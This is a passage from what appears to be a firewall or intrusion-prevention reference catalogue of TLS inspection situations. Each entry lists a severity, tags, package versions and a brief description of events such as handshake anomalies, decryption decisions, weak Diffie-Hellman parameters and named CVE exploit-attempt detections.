Description: A TLS tunnel with web traffic inside was seen. The TLS handshake has indicated that the protocol inside the tunnel is either HTTP/1.1 or HTTP/2. This application can be used for controlling all web based TLS traffic.
Back to top

TLS_Alert

About this situation: TLS Alert seen
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-511-5211
Description: TLS Alert message was seen in the SSL/TLS connection. An error has occurred in the connection. The connection may close soon.
Back to top

TLS_Anonymous-Diffie-Hellman

About this situation: TLS Ciphersuite with Anonymous Diffie-Hellman Negotiated
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: In an SSL/TLS connection a ciphersuite using anonymous Diffie-Hellman key agreement was negotiated. Because there is no server certificate, this connection does not provide protection against man-in-the-middle attacks.
Back to top

TLS_Certificate-Change-Failed

About this situation: Certificate could not be changed in TLS/SSL server message
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: There was an error while creating a new server certificate in a TLS/SSL connection for TLS/SSL inspection. The data in the connection after this handshake will not be decrypted anymore.
Back to top

TLS_Certificate-Syntax-Error

About this situation: A certificate in server certificate chain could not be read
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TLS/SSL inspection was in use and a certificate in server certificate chain could not be read. TLS/SSL inspection cannot be continued. The action for this situation is always Terminate.
Back to top

TLS_Certificate-Verify-Error-Overridden

About this situation: SSL/TLS server certificate verification error was overridden
Context: TLS without parameters
Severity: 1
Tags: System Inspections
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Description: The server certificate verification error was overridden in an SSL/TLS connection. The engine assumes that the certificate can be trusted. This situation can arise if e.g. a network application has the disable TLS CA validation option set. See Certificate Verify Error field for the original verification error.
Back to top

TLS_Certificate-Verify-Failed

About this situation: SSL/TLS server certificate could not be verified
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: The server certificate could not be verified in an SSL/TLS connection. The engine cannot trust the server. This may be caused by a missing CA certificate or a missing self signed certificate in the engine configuration. In SSL/TLS inspection a temporary self signed certificate will be used for this server.
Back to top

TLS_Client-Extension-Heartbeat

About this situation: TLS client sent Heartbeat extension in Client Hello
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-577-5211
Description: TLS client sent the Heartbeat extension [RFC 6520] in the Client Hello message.
Back to top

TLS_Client-Heartbeat-Message

About this situation: TLS Heartbeat message sent by the client was seen
Context: TLS without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-577-5211
Description: TLS client sent a record message with the Heartbeat content type [RFC 6520]. There is a critical vulnerability in multiple versions of OpenSSL related to handling of TLS heartbeat packets (CVE-2014-0160).
Back to top

TLS_Client-Hello

About this situation: SSL/TLS Client hello message was seen
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: A Client hello message was seen in a SSL/TLS connection. This should normally happen in the beginning of the connection when SSL/TLS handshake is performed.
Back to top

TLS_Client-Hello-No-SNI-Extension

About this situation: No Server Name Indication extension seen in Client hello
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Description: The Client hello message did not contain a Server Name Indication extension.
Back to top

TLS_Client-Hello-Server-Endpoint-Known

About this situation: Connecting to a known TLS server, using cached certificate
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: TLS server certificate fetching has been enabled in the engine properties, and the certificate of the server endpoint was found from the certificate cache in the engine. The cached server certificate will be used by the engine when processing TLS Client Hello. If another certificate is seen later from the server, the matches made based on the cached certificate will be invalidated, and replaced with matches from the actual server certificate.
Back to top

TLS_Client-Hello-Server-Endpoint-Unknown

About this situation: Connecting to an unknown TLS server, certificate not available
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: TLS server certificate fetching has been enabled in the engine properties, the certificate of the server endpoint was not found from the certificate cache in the engine, and the engine was unable to fetch the certificate from the server when processing TLS Client Hello. The engine was unable to verify the server during TLS Client Hello processing. The server certificate may be seen later in the connection.
Back to top

TLS_Client-Hello-SNI-Extension-Invalid-Name-List

About this situation: The Server Name List in the SNI extension of the TLS Client Hello is invalid
Context: TLS without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-1516-5242
Last changed: sgpkg-ips-1516-5242
Description: The TLS Client Hello message contains a Server Name Indication extension with an invalid Server Name List.
Back to top

TLS_Client-Hello-SNI-Extension-IPv4-Address

About this situation: The HostName in the SNI extension of the TLS Client Hello is an IPv4 address
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-1516-5242
Last changed: sgpkg-ips-1516-5242
Description: The TLS Client Hello message contains a Server Name Indication extension with a literal IPv4 address as the HostName.
Back to top

TLS_Client-Hello-SNI-Extension-IPv6-Address

About this situation: The HostName in the SNI extension of the TLS Client Hello is an IPv6 address
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-1516-5242
Last changed: sgpkg-ips-1516-5242
Description: The TLS Client Hello message contains a Server Name Indication extension with a literal IPv6 address as the HostName.
Back to top

TLS_Client-Syntax-Error

About this situation: Syntax error in TLS client stream
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-445-4219
Vulnerability: OpenSSL-TLS-Connection-Record-Handling-Denial-Of-Service
Description: There was an unrecoverable syntax error in the TLS/SSL client stream. This can be caused by a client that does not actually use the TLS/SSL protocol or if the client uses a protocol version that is not supported by the TLS and HTTPS module.
Back to top

TLS_Close-Notify

About this situation: TLS Close Notify message seen
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-371-4219
Description: TLS Close Notify message was seen in the TLS alert channel. This is the normal way to close an SSL/TLS connection. The connection should be closed soon.
Back to top

TLS_Connection-Not-Decrypted-For-Inspection

About this situation: The TLS connection will not be decrypted.
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-1105-5242
Description: The TLS connection will not be decrypted. No inspection of the application data will be done.
Back to top

TLS_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in BEA Systems WebLogic detected
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BEA WebLogic, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: Bea-WebLogic-SSL-Handling-Denial-Of-Service
Description:
Back to top

TLS_CS-Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow

About this situation: A possible attempt to exploit a vulnerability in Cisco Systems Unified CallManager detected
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Unified CallManager, Cisco Systems Unified Communications Manager, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: CTL_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow
Description:
Back to top

TLS_CS-Encrypted_Server_Name_Indicator

About this situation: Encrypted Server Name Indicator usage detected
Context: TLS Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1237-5242
Vulnerability: Encrypted_Server_Name_Indicator
Description:
Back to top

TLS_CS-Facebook-Fizz-Early-Data-Integer-Overflow-DoS

About this situation: An attempt to exploit a vulnerability in Facebook Fizz detected.
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Facebook Fizz, CVE2019, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Vulnerability: Facebook-Fizz-Early-Data-Integer-Overflow-DoS
Description:
Back to top

TLS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Free Software Foundation GnuTLS detected
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Description:
Back to top

TLS_CS-LDAP-Ssl-Library-Malformed-Client-Hello-DoS

About this situation: Microsoft SSL library fails to handle malformed SSL Hello messages
Context: TLS Client Stream
Severity: 2
Tags: Windows, Any Hardware, IIS, MS2004, CVE2004, Windows not specific, IIS not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: SSLv3-Library-DoS
Description:
Back to top

TLS_CS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1564-5242
Vulnerability: OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
Description:
Back to top

TLS_CS-OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in OpenSSL detected.
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2020, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference
Description:
Back to top

TLS_CS-OpenSSL-TLS-AES-NI-DoS

About this situation: An attempt to exploit an OpenSSL TLS AES-NI DoS vulnerability detected.
Context: TLS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2012, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: OpenSSL-TLS-AES-NI-DoS
Description:
Back to top

TLS_CS-OpenSSL-X.509-Punycode-Email-Address-BOF

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1551-5242
Vulnerability: OpenSSL-X.509-Email-Address-4-Byte-Buffer-Overflow-CVE-2022-3602
OpenSSL-Email-Address-Variable-Length-Buffer-Overflow-CVE-2022-3786
Description:
Back to top

TLS_CS-Possible-Psiphon-Meek-Domain-Fronting

About this situation: Possible Meek Domain Fronting detected
Context: TLS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols, TCP Client Traffic
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-857-5242
Vulnerability: TOR-Network-Usage
Description:
Back to top

TLS_CS-Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion

About this situation: An attempt to exploit a vulnerability in Red Hat 389 Directory Server detected.
Context: TLS Client Stream
Severity: 7
Tags: Red Hat Linux, Any Hardware, Red Hat 389 Directory Server, CVE2019, Red Hat Linux not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1153-5242
Vulnerability: Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion
Description:
Back to top

TLS_CS-TOR-Meek-Domain-Fronting

About this situation: Meek Domain Fronting bridging detected
Context: TLS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, TOR client, Any Operating System not specific, TOR client not specific, Tunneling Protocols, TCP Client Traffic
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Vulnerability: TOR-Network-Usage
Description:
Back to top

TLS_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Trend Micro OfficeScan Corporate Edition detected
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan Corporate Edition, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow
Description:
Back to top

TLS_CS-Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: TLS Client Stream
Severity: 2
Tags: Windows, Any Hardware, LSASS, MS2024-08, CVE2024, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Vulnerability: Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148
Description:
Back to top

TLS_CS-Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in wolfSSL detected
Context: TLS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, wolfSSL, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow
Description:
Back to top

TLS_CS_Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819

About this situation: An attempt to exploit a vulnerability in Schannel detected
Context: TLS Client Stream
Severity: 7
Tags: Windows, Any Hardware, LSASS, MS2023-02, CVE2023, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1556-5242
Vulnerability: Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819
Description:
Back to top

TLS_Decrypted-Domain

About this situation: Connections to this server will be decrypted
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: None of the domain names on the server certificate match to the list of non-decrypted domains in the configured HTTPS inspection policy, and TLS/SSL inspection is enabled in the configuration. The connection will be decrypted.
Back to top

TLS_Decryption-Disallowed-While-Already-Decrypting

About this situation: The disallow decryption decision is made, when decryption of the TLS connection has already started.
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-1088-5242
Description: The decryption of the TLS connection has already started, when the decision to disallow decryption based on access rule is made. This situation can arise if e.g. a network application or URL category that has the decryption disallowed option set in the access rules, is identified after decryption has already started.
Back to top

TLS_DH-Nonstandard-Generator

About this situation: Diffie-Hellman parameter warning: nonstandard generator
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: In SSL/TLS handshake the server gave Diffie-Hellman parameters with a nonstandard generator. Standard checks for generator safety and suitability can't be used. The handshake may fail and/or the connection may be insecure.
Back to top

TLS_DH-Not-Suitable-Generator

About this situation: Diffie-Hellman parameter error: unsuitable generator
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: In SSL/TLS handshake the server gave invalid Diffie-Hellman parameters. The generator is not suitable to use with the prime. This may lead to connection handshake failure and/or insecure connection.
Back to top

TLS_DH-P-Not-Prime

About this situation: Diffie-Hellman parameter error: p is not prime
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: In SSL/TLS handshake the server gave invalid Diffie-Hellman parameters. The p parameter should be a prime, but it is not. This may lead to connection handshake failure and/or insecure connection.
Back to top

TLS_DH-P-Not-Safe-Prime

About this situation: Diffie-Hellman parameter error: p is not a safe prime
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: In SSL/TLS handshake the server gave invalid Diffie-Hellman parameters. The p parameter should be a safe prime, but it is not. This may lead to connection handshake failure and/or insecure connection.
Back to top

TLS_Double-Hello

About this situation: Double hello in TLS handshake
Context: TLS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-371-4219
Description: Double hello in TLS handshake Windows XP SP1 is vulnerable to an attack where two handshake hellos are sent when initiating a TLS connection with e.g. IIS. This causes a DOS in the target machine. Risk analysis: Risk level is fairly low.
Back to top

TLS_Early-Data-Rejected

About this situation: TLS early data rejected by NGFW
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The NGFW engine has chosen to reject the TLS early data. This can happen, when the data is sent with keys that are unknown to the NGFW or if the Client Hello modification depends on some delayed processing eg. SNI based URL filtering.
Back to top

TLS_Early-Data-Seen

About this situation: TLS early data seen
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The TLS Client Hello message contains an early data extension indicating that the client is opting to send early data.
Back to top

TLS_Early-Data-Size-Exceeded

About this situation: TLS early data size limit exceeded.
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: When a TLS server allows sending of early data it will set the maximum amount of early data allowed for the connection in the extensions of the New Session Ticket message establishing the early data keys. This situation indicates that the TLS client has sent more early data than was originally allowed for the connection.
Back to top

TLS_Empty-Record-Message

About this situation: TLS Record message with zero length
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Description: TLS/SSL inspection was in use and a record message with length zero was seen. This usually indicates that the connection is not actually using TLS/SSL. If the TCP payload data was already modified in this connection because of TLS/SSL inspection, the TLS/SSL inspection will continue normally. If the TCP payload data was not (yet) modified, the TLS/SSL parsing is stopped; with protocol identification this connection is no more considered to be TLS/SSL and without protocol identification only the TCP stream fingerprinting is done for the rest of the connection.
Back to top

TLS_Export-Ciphersuite

About this situation: TLS Export Ciphersuite Negotiated
Context: TLS without parameters
Severity: 6
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-632-5211
Vulnerability: OpenSSL-RSA-To-EXPORT_RSA-Downgrade-Attack
Weak-Diffie-Hellman-Parameters
Description: In an SSL/TLS connection a ciphersuite with short key length was negotiated, i.e. so called export ciphersuite was used. Because of the short key the connection does not provide a good security.
Back to top

TLS_Handshake-Downgraded

About this situation: TLS handshake was downgraded
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-671-5211
Description: The handshake for the TLS session was downgraded. This can occur if the client attempts to resume a session which is unknown to the engine or if the handshake message contains unsupported protocols, cipher suites or extensions and the engine is allowed to decrypt and downgrade the session. Unsupported portions of the handshake have been removed.
Back to top

TLS_Handshake-Modification-Not-Possible

About this situation: Hello message cannot be modified
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Description: The hello message cannot be modified. Either the modified session would become insecure or the negotiated protocols are not supported.
Back to top

TLS_Hello-Retry-Request

About this situation: A TLS Hello Retry Request message was seen
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: A TLS Hello Retry Request message was seen.
Back to top

TLS_Illegal-Parameter

About this situation: A TLS handshake message contained an illegal parameter
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: A parameter in a TLS handshake message was incorrect. This situation arises, when protocol parameters set by the session resumption PSK differ from the ones negotiated in the handshake.
Back to top

TLS_Incomplete-Configuration-For-Decrypting

About this situation: Connection cannot be decrypted because of missing configuration
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-567-5211
Description: SSL/TLS inspection was requested in the configuration for this connection, but the connection cannot be decrypted because the configuration contains neither Server Protection Credentials for this server nor Client Protection Certificate Authority.
Back to top

TLS_Inspection_Not_Supported

About this situation: TLS inspection is not possible
Context: TLS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-463-5211
Description: TLS/SSL connection uses an unsupported interface type (a capture interface) or transport (a tunnel). The data in the connection can not be decrypted.
Back to top

TLS_Invalid-Change-Cipher

About this situation: Invalid TLS/SSL Change Cipher Spec message
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid Change Cipher Spec message was seen. This can be caused by an error in the client/server software or by an attack attempt to modify the message contents. The action for this situation is always Terminate.
Back to top

TLS_Invalid-Client-Key-Share

About this situation: TLS Client key share validation failed.
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The TLS client has provided an invalid key share extension. This situation arises, when the key share extension in Client Hello message has more entries than what was provided in the supported groups extension or when the ordering of entries between the extensions doesn't match.
Back to top

TLS_Invalid-Server-Key-Exchange

About this situation: TLS server key exchange message could not be parsed
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TLS/SSL inspection was in use and a server key exchange message could not be parsed. The connection cannot be continued. The action for this situation is always Terminate.
Back to top

TLS_Invalid-Server-Key-Share

About this situation: TLS Server key share validation failed
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The TLS server has provided an invalid key share extension. This situation arises, when the key share extension in TLS Server Hello message contains parameters for an unsupported named group or the key share extension in a TLS Hello Retry Request message contains a request for a group that was already provided in the original TLS Client Hello.
Back to top

TLS_MAC-Error

About this situation: MAC check failure in TLS/SSL record message
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: The MAC (Message Authentication Code) was incorrect in a TLS/SSL record message. This can be caused by an error in the client/server software or by an attack attempt to modify the message contents. The action for this situation is always Terminate.
Back to top

TLS_Memory-Allocation-Error

About this situation: Memory allocation error in TLS/SSL record layer processing
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Not enough memory was available for TLS/SSL record layer processing. The connection cannot be continued. The action for this situation is always Terminate.
Back to top

TLS_No-Cipher-Overlap

About this situation: A TLS server offered a ciphersuite not in Client Hello
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The cipher suite selected by the TLS server and offered in Server Hello message did not match any of the ciphersuites offered in the Client Hello message.
Back to top

TLS_No-Decryption

About this situation: This connection will not be decrypted.
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Description: TLS Inspection has not been configured in the engine properties. The connection will not be decrypted.
Back to top

TLS_Non-Decrypted-Domain

About this situation: Connections to this server will not be decrypted
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: The domain name(s) on the server certificate match to the list of non-decrypted domains in the configured HTTPS inspection policy. The connection will not be decrypted.
Back to top

TLS_Non-Decrypted-Issuer

About this situation: Connections to this server will not be decrypted
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: An issuer certificate in the certificate chain matches the list of non-decrypted issuer certificates in the configured HTTPS inspection policy. The connection will not be decrypted.
Back to top

TLS_Non-Decrypted-TLS-Match

About this situation: Connections with this TLS match will not be decrypted
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: The server certificate matched to a TLS Match situation with no decrypting option. This connection will not be decrypted.
Back to top

TLS_Not-TLS

About this situation: The connection does not look like using TLS/SSL
Context: TLS without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-549-5211
Description: The connection does not look like using TLS/SSL.
Back to top

TLS_Proxy-Redirection-Failed

About this situation: Proxy Server redirection denied
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description: Proxy Server redirection was tried for the TLS stream but it was denied by the Proxy Server.
Back to top

TLS_Proxy_Authentication_Required

About this situation: Proxy authentication required
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description: Proxy Server redirection was tried for the TLS stream, but the Proxy Server replied with code 407: Proxy Authentication Required.
Back to top

TLS_Server-Certificate-Cached-Processed

About this situation: A cached TLS server certificate was processed for the TLS connection
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1505-5242
Last changed: sgpkg-ips-1505-5242
Description: A cached TLS server certificate was processed successfully.
Back to top

TLS_Server-Certificate-Denied-Decryption

About this situation: Client Hello message was modified and certificate denied decryption
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Description: The Client hello message was modified but the server certificate denies decryption. The session may close.
Back to top

TLS_Server-Certificate-Fetching-Processed

About this situation: The server certificate for a TLS connection was fetched and processed successfully
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1505-5242
Last changed: sgpkg-ips-1505-5242
Description: The server certificate for a TLS connection was fetched and processed successfully.
Back to top

TLS_Server-Certificate-Processed

About this situation: The server certificate in a TLS connection was processed successfully
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-591-5211
Description: The server certificate in a TLS connection was processed successfully.
Back to top

TLS_Server-Certificate-Revoked

About this situation: The certificate presented by the TLS server has been revoked.
Context: TLS without parameters
Severity: 1
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Description: The certificate revocation checking feature has been enabled for TLS inspection and the result of the check indicates that the certificate has been revoked.
Back to top

TLS_Server-Extension-Heartbeat

About this situation: TLS server sent Heartbeat extension in Server Hello
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-577-5211
Description: TLS server sent the Heartbeat extension [RFC 6520] in the Server Hello message.
Back to top

TLS_Server-Heartbeat-Message

About this situation: TLS Heartbeat message sent by the server was seen
Context: TLS without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-577-5211
Description: TLS server sent a record message with the Heartbeat content type [RFC 6520]. There is a critical vulnerability in multiple versions of OpenSSL related to handling of TLS heartbeat packets (CVE-2014-0160).
Back to top

TLS_Server-Hello

About this situation: SSL/TLS Server hello message was seen
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: A Server hello message was seen in a SSL/TLS connection. This should normally happen in the beginning of the connection when SSL/TLS handshake is performed.
Back to top

TLS_Server-Protocol-Negotiation-Failed

About this situation: Server does not support negotiated protocols
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
